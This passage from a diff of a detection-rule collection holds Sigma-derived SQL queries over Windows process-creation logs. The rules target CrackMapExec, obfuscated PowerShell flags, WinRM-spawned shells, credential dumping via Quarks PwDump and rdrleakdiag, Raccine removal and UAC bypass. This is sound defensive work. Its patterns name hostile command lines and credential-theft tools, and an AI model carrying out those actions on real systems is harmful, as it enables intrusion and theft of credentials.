"058f4380-962d-40a5-afce-50207d36d7e2", + "status": "stable", + "description": "Detects various execution patterns of the CrackMapExec pentesting framework", + "author": "Thomas Patzke", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.execution", + "attack.t1047", + "attack.t1053", + "attack.t1059.003", + "attack.t1059.001", + "attack.s0106" ], "falsepositives": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment", - "Monitoring activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND NOT (((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe' ESCAPE '\\') OR (ParentProcessName = '') OR (ParentProcessName = '')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%cmd.exe /Q /c % 1> \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > %\\\\Temp\\\\% 2>&1' ESCAPE '\\') AND (CommandLine LIKE '%powershell.exe -exec bypass -noni -nop -w 1 -C \"%' ESCAPE '\\' OR CommandLine LIKE '%powershell.exe -noni -nop -w 1 -enc %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_whoami_parent_anomaly.yml" + "filename": "proc_creation_win_hktl_crackmapexec_execution_patterns.yml" }, { - "title": "Use NTFS Short Name in Command Line", - "id": "dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795", + "title": "Taskmgr as LOCAL_SYSTEM", + "id": "9fff585c-c33e-4a86-b3cd-39312079a65f", "status": "experimental", - "description": "Detect use of the Windows 
8.3 short name. Which could be used as a method to avoid command-line detection", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1564.004" + "attack.t1036" ], "falsepositives": [ - "Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%~1.exe%' ESCAPE '\\' OR CommandLine LIKE '%~1.bat%' ESCAPE '\\' OR CommandLine LIKE '%~1.msi%' ESCAPE '\\' OR CommandLine LIKE '%~1.vbe%' ESCAPE '\\' OR CommandLine LIKE '%~1.vbs%' ESCAPE '\\' OR CommandLine LIKE '%~1.dll%' ESCAPE '\\' OR CommandLine LIKE '%~1.ps1%' ESCAPE '\\' OR CommandLine LIKE '%~1.js%' ESCAPE '\\' OR CommandLine LIKE '%~1.hta%' ESCAPE '\\' OR CommandLine LIKE '%~2.exe%' ESCAPE '\\' OR CommandLine LIKE '%~2.bat%' ESCAPE '\\' OR CommandLine LIKE '%~2.msi%' ESCAPE '\\' OR CommandLine LIKE '%~2.vbe%' ESCAPE '\\' OR CommandLine LIKE '%~2.vbs%' ESCAPE '\\' OR CommandLine LIKE '%~2.dll%' ESCAPE '\\' OR CommandLine LIKE '%~2.ps1%' ESCAPE '\\' OR CommandLine LIKE '%~2.js%' ESCAPE '\\' OR CommandLine LIKE '%~2.hta%' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\') OR CommandLine LIKE '%C:\\\\xampp\\\\vcredist\\\\VCREDI~1.EXE%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_ntfs_short_name_use_cli.yml" + "filename": "proc_creation_win_taskmgr_localsystem.yml" 
}, { - "title": "Potential Commandline Obfuscation Using Unicode Characters", - "id": "e0552b19-5a83-4222-b141-b36184bb8d79", - "status": "test", - "description": "Detects potential commandline obfuscation using unicode characters.\nAdversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.\n", - "author": "frack113, Florian Roth (Nextron Systems)", + "title": "Suspicious Processes Spawned by WinRM", + "id": "5cc2cda8-f261-4d88-a2de-e9e193c86716", + "status": "experimental", + "description": "Detects suspicious processes including shells spawnd from WinRM host process", + "author": "Andreas Hunkeler (@Karneades), Markus Neis", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.t1190", + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ - "Unknown" + "Legitimate WinRM usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%ˣ%' ESCAPE '\\' OR CommandLine LIKE '%˪%' ESCAPE '\\' OR CommandLine LIKE '%ˢ%' ESCAPE '\\') OR (CommandLine LIKE '%∕%' ESCAPE '\\' OR CommandLine LIKE '%⁄%' ESCAPE '\\') OR (CommandLine LIKE '%―%' ESCAPE '\\' OR CommandLine LIKE '%—%' ESCAPE '\\') OR (CommandLine LIKE '%â%' ESCAPE '\\' OR CommandLine LIKE '%€%' ESCAPE '\\' OR CommandLine LIKE '%£%' ESCAPE '\\' OR CommandLine LIKE '%¯%' ESCAPE '\\' OR CommandLine LIKE '%®%' ESCAPE '\\' OR CommandLine LIKE '%µ%' ESCAPE '\\' OR CommandLine LIKE '%¶%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_cli_obfuscation_unicode.yml" + "filename": "proc_creation_win_winrm_susp_child_process.yml" }, { - "title": "Exploit for CVE-2017-0261", - "id": "864403a1-36c9-40a2-a982-4c9a45f7d833", + "title": "Suspicious PowerShell Parameter Substring", + "id": "36210e0d-5b19-485d-a087-c096088885f0", "status": "test", - "description": "Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious PowerShell invocation with a parameter substring", + "author": "Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)", "tags": [ "attack.execution", - "attack.t1203", - "attack.t1204.002", - "attack.initial_access", - "attack.t1566.001" + "attack.t1059.001" ], "falsepositives": [ - "Several false positives identified, check for suspicious file names or locations (e.g. 
Temp folders)" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND NewProcessName LIKE '%\\\\FLTLDR.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% -windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% -windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% -windowst h%' ESCAPE '\\' OR CommandLine LIKE '% -windows h%' ESCAPE '\\' OR CommandLine LIKE '% -windo h%' ESCAPE '\\' OR CommandLine LIKE '% -wind h%' ESCAPE '\\' OR CommandLine LIKE '% -win h%' ESCAPE '\\' OR CommandLine LIKE '% -wi h%' ESCAPE '\\' OR CommandLine LIKE '% -win h %' ESCAPE '\\' OR CommandLine LIKE '% -win hi %' ESCAPE '\\' OR CommandLine LIKE '% -win hid %' ESCAPE '\\' OR CommandLine LIKE '% -win hidd %' ESCAPE '\\' OR CommandLine LIKE '% -win hidde %' ESCAPE '\\' OR CommandLine LIKE '% -NoPr %' ESCAPE '\\' OR CommandLine LIKE '% -NoPro %' ESCAPE '\\' OR CommandLine LIKE '% -NoProf %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% -nonin %' ESCAPE '\\' OR CommandLine LIKE '% -nonint %' ESCAPE '\\' OR CommandLine LIKE '% -noninte %' ESCAPE '\\' OR CommandLine LIKE '% -noninter %' ESCAPE '\\' OR CommandLine LIKE '% -nonintera %' ESCAPE '\\' OR CommandLine LIKE '% -noninterac %' ESCAPE '\\' OR CommandLine LIKE '% -noninteract %' ESCAPE '\\' OR CommandLine LIKE '% -noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% -noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% -ec %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComm %' ESCAPE '\\' OR CommandLine 
LIKE '% -encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% -encodedC %' ESCAPE '\\' OR CommandLine LIKE '% -encoded %' ESCAPE '\\' OR CommandLine LIKE '% -encode %' ESCAPE '\\' OR CommandLine LIKE '% -encod %' ESCAPE '\\' OR CommandLine LIKE '% -enco %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% -executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% -executionpol %' ESCAPE '\\' OR CommandLine LIKE '% -executionpo %' ESCAPE '\\' OR CommandLine LIKE '% -executionp %' ESCAPE '\\' OR CommandLine LIKE '% -execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass%' ESCAPE '\\' OR CommandLine LIKE '% /windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% /windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% /windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% /windowst h%' ESCAPE '\\' OR CommandLine LIKE '% /windows h%' ESCAPE '\\' OR CommandLine LIKE '% /windo h%' ESCAPE '\\' OR CommandLine LIKE '% /wind h%' ESCAPE '\\' OR CommandLine LIKE '% /win h%' ESCAPE '\\' OR CommandLine LIKE '% /wi h%' ESCAPE '\\' OR CommandLine LIKE '% /win h %' ESCAPE '\\' OR CommandLine LIKE '% /win hi %' ESCAPE '\\' OR CommandLine LIKE '% /win hid %' ESCAPE '\\' OR CommandLine LIKE '% /win hidd %' ESCAPE '\\' OR CommandLine LIKE '% /win hidde %' ESCAPE '\\' OR CommandLine LIKE '% /NoPr %' ESCAPE '\\' OR CommandLine LIKE '% /NoPro %' ESCAPE '\\' OR CommandLine LIKE '% /NoProf %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% /nonin 
%' ESCAPE '\\' OR CommandLine LIKE '% /nonint %' ESCAPE '\\' OR CommandLine LIKE '% /noninte %' ESCAPE '\\' OR CommandLine LIKE '% /noninter %' ESCAPE '\\' OR CommandLine LIKE '% /nonintera %' ESCAPE '\\' OR CommandLine LIKE '% /noninterac %' ESCAPE '\\' OR CommandLine LIKE '% /noninteract %' ESCAPE '\\' OR CommandLine LIKE '% /noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% /noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% /ec %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% /encodedC %' ESCAPE '\\' OR CommandLine LIKE '% /encoded %' ESCAPE '\\' OR CommandLine LIKE '% /encode %' ESCAPE '\\' OR CommandLine LIKE '% /encod %' ESCAPE '\\' OR CommandLine LIKE '% /enco %' ESCAPE '\\' OR CommandLine LIKE '% /en %' ESCAPE '\\' OR CommandLine LIKE '% /executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% /executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% /executionpol %' ESCAPE '\\' OR CommandLine LIKE '% /executionpo %' ESCAPE '\\' OR CommandLine LIKE '% /executionp %' ESCAPE '\\' OR CommandLine LIKE '% /execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ep bypass%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2017_0261.yml" + "filename": "proc_creation_win_powershell_susp_parameter_variation.yml" }, { - "title": "Script Interpreter Execution From Suspicious Folder", - "id": "1228c958-e64e-4e71-92ad-7d429f4138ba", + "title": "Potential MSTSC Shadowing 
Activity", + "id": "6ba5a05f-b095-4f0a-8654-b825f4f16334", "status": "test", - "description": "Detects a suspicious script executions in temporary folders or folders accessible by environment variables", + "description": "Detects RDP session hijacking by using MSTSC shadowing", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.lateral_movement", + "attack.t1563.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass %' ESCAPE '\\' OR CommandLine LIKE '%/e:vbscript %' ESCAPE '\\' OR CommandLine LIKE '%/e:javascript %' ESCAPE '\\') OR OriginalFileName IN ('powershell.exe', 'pwsh.dll', 'mshta.exe', 'wscript.exe', 'cscript.exe', 'cmd.exe')) AND (NewProcessName LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%noconsentprompt%' ESCAPE '\\' AND CommandLine LIKE '%shadow:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_script_exec_from_env_folder.yml" + "filename": "proc_creation_win_mstsc_rdp_hijack_shadowing.yml" }, { - "title": "HackTool - Koadic Execution", - "id": "5cddf373-ef00-4112-ad72-960ac29bac34", + "title": "Raccine 
Uninstall", + "id": "a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc", "status": "test", - "description": "Detects command line parameters used by Koadic hack tool", - "author": "wagga, Jonhnathan Ribeiro, oscd.community", + "description": "Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.003", - "attack.t1059.005", - "attack.t1059.007" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate deinstallation by administrative staff" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%/q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%chcp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%taskkill %' ESCAPE '\\' AND CommandLine LIKE '%RaccineSettings.exe%' ESCAPE '\\') OR (CommandLine LIKE '%reg.exe%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Tray%' ESCAPE '\\') OR (CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%/DELETE%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Rules Updater%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_koadic.yml" + "filename": "proc_creation_win_susp_disable_raccine.yml" }, { - "title": "Suspicious Execution From GUID Like Folder Names", - "id": "90b63c33-2b97-4631-a011-ceb0f47b77c3", - "status": "experimental", - "description": "Detects potential suspicious execution of a GUID like folder name located in a suspicious location such as %TEMP% as seen being used in IcedID attacks", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Runscripthelper.exe", + "id": "eca49c87-8a75-4f13-9c73-a5a29e845f03", + 
"status": "test", + "description": "Detects execution of powershell scripts via Runscripthelper.exe", + "author": "Victor Sergeev, oscd.community", "tags": [ + "attack.execution", + "attack.t1059", "attack.defense_evasion", - "attack.t1027" + "attack.t1202" ], "falsepositives": [ - "Installers are sometimes known for creating temporary folders with GUID like names. Add appropriate filters accordingly" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') AND CommandLine LIKE '%\\\\{%' ESCAPE '\\' AND CommandLine LIKE '%}\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\{%' ESCAPE '\\' AND NewProcessName LIKE '%}\\\\%' ESCAPE '\\') OR (NewProcessName = '') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\drvinst.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\Runscripthelper.exe' ESCAPE '\\' AND CommandLine LIKE '%surfacecheck%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_execution_from_guid_folder_names.yml" + "filename": "proc_creation_win_lolbin_runscripthelper.yml" }, { - "title": "ImagingDevices Unusual Parent/Child Processes", - "id": "f11f2808-adb4-46c0-802a-8660db50fa99", + "title": "HackTool - SharpUp PrivEsc Tool Execution", + "id": "c484e533-ee16-4a93-b6ac-f0ea4868b2f1", "status": "experimental", - "description": "Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of SharpUp, a tool for local privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution" + "attack.privilege_escalation", + "attack.t1615", + "attack.t1569.002", + 
"attack.t1574.005" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND NewProcessName LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') OR ParentProcessName LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpUp.exe' ESCAPE '\\' OR Description = 'SharpUp' OR (CommandLine LIKE '%HijackablePaths%' ESCAPE '\\' OR CommandLine LIKE '%UnquotedServicePath%' ESCAPE '\\' OR CommandLine LIKE '%ProcessDLLHijack%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableServiceBinaries%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableScheduledTask%' ESCAPE '\\' OR CommandLine LIKE '%DomainGPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%CachedGPPPassword%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_imagingdevices_unusual_parents.yml" + "filename": "proc_creation_win_hktl_sharpup.yml" }, { - "title": "HackTool - Quarks PwDump Execution", - "id": "0685b176-c816-4837-8e7b-1216f346636b", - "status": "experimental", - "description": "Detects usage of the Quarks PwDump tool via commandline arguments", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Process Memory Dump via RdrLeakDiag.EXE", + "id": "edadb1e5-5919-4e4c-8462-a9e643b02c4b", + "status": "test", + "description": "Detects the use of the Microsoft Windows Resource Leak Diagnostic tool \"rdrleakdiag.exe\" to dump process memory", + "author": "Cedric MAURUGEON, Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1003.002" + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * 
FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\QuarksPwDump.exe' ESCAPE '\\' OR CommandLine IN (' -dhl', ' --dump-hash-local', ' -dhdc', ' --dump-hash-domain-cached', ' --dump-bitlocker', ' -dhd ', ' --dump-hash-domain ', '--ntds-file')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((CommandLine LIKE '%fullmemdmp%' ESCAPE '\\' OR CommandLine LIKE '%/memdmp%' ESCAPE '\\' OR CommandLine LIKE '%-memdmp%' ESCAPE '\\') AND (CommandLine LIKE '% -o %' ESCAPE '\\' OR CommandLine LIKE '% /o %' ESCAPE '\\') AND (CommandLine LIKE '% -p %' ESCAPE '\\' OR CommandLine LIKE '% /p %' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\rdrleakdiag.exe' ESCAPE '\\' OR OriginalFileName = 'RdrLeakDiag.exe') AND (CommandLine LIKE '%fullmemdmp%' ESCAPE '\\' OR CommandLine LIKE '%/memdmp%' ESCAPE '\\' OR CommandLine LIKE '%-memdmp%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_hktl_quarks_pwdump.yml" + "filename": "proc_creation_win_rdrleakdiag_process_dumping.yml" }, { - "title": "HackTool - SharpLdapWhoami Execution", - "id": "d9367cbb-c2e0-47ce-bdc0-128cb6da898d", - "status": "experimental", - "description": "Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller", - "author": "Florian Roth (Nextron Systems)", + "title": "Webshell Recon Detection Via CommandLine & Processes", + "id": "f64e5c19-879c-4bae-b471-6d84c8339677", + "status": "test", + "description": "Detects processes spawned from web servers (php, tomcat, iis...etc) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands", + "author": "Cian Heasley, Florian Roth", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ - "Programs that use the same command line flags" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE 
((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpLdapWhoami.exe' ESCAPE '\\' OR OriginalFileName LIKE '%SharpLdapWhoami%' ESCAPE '\\' OR Product = 'SharpLdapWhoami' OR (CommandLine LIKE '% /method:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /method:kerb' ESCAPE '\\' OR CommandLine LIKE '% /method:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /m:kerb' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND (CommandLine LIKE '%perl --help%' ESCAPE '\\' OR CommandLine LIKE '%python --help%' ESCAPE '\\' OR CommandLine LIKE '%python -h%' ESCAPE '\\' OR CommandLine LIKE '%python3 --help%' ESCAPE '\\' OR CommandLine LIKE '%python3 -h%' ESCAPE '\\' OR CommandLine LIKE '%wget --help%' ESCAPE '\\' OR CommandLine LIKE '%perl -h%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sharpldapwhoami.yml" + "filename": "proc_creation_win_webshell_recon_detection.yml" }, { - "title": "Wscript Execution from Non C Drive", - "id": "5b80cf53-3a46-4adc-960b-05ec19348d74", - "status": "experimental", - "description": "Detects Wscript or Cscript executing from a 
drive other than C. This has been observed with Qakbot executing from within a mounted ISO file.", - "author": "Aaron Herman", + "title": "HackTool - Empire PowerShell UAC Bypass", + "id": "3268b746-88d8-4cd3-bffc-30077d02c787", + "status": "stable", + "description": "Detects some Empire PowerShell UAC bypass methods", + "author": "Ecco", "tags": [ - "attack.execution", - "attack.t1059" - ], - "falsepositives": [ - "Legitimate scripts located on other partitions such as \"D:\"" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\') AND CommandLine LIKE '%:\\\\%' ESCAPE '\\') AND NOT (((CommandLine LIKE '% C:\\\\\\*' ESCAPE '\\' OR CommandLine LIKE '% ''C:\\\\%' ESCAPE '\\' OR CommandLine LIKE '% \"C:\\\\\\*' ESCAPE '\\')) OR (CommandLine LIKE '%\\%%' ESCAPE '\\') OR (CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')))" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" ], - "filename": "proc_creation_win_susp_lolbin_non_c_drive.yml" - }, - { - "title": "Potential DLL File Download Via PowerShell Invoke-WebRequest", - "id": "0f0450f3-8b47-441e-a31b-15a91dc243e2", - "status": "experimental", - "description": "Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest cmdlet", - "author": "Florian Roth (Nextron Systems), Hieu Tran", "falsepositives": [ "Unknown" ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine 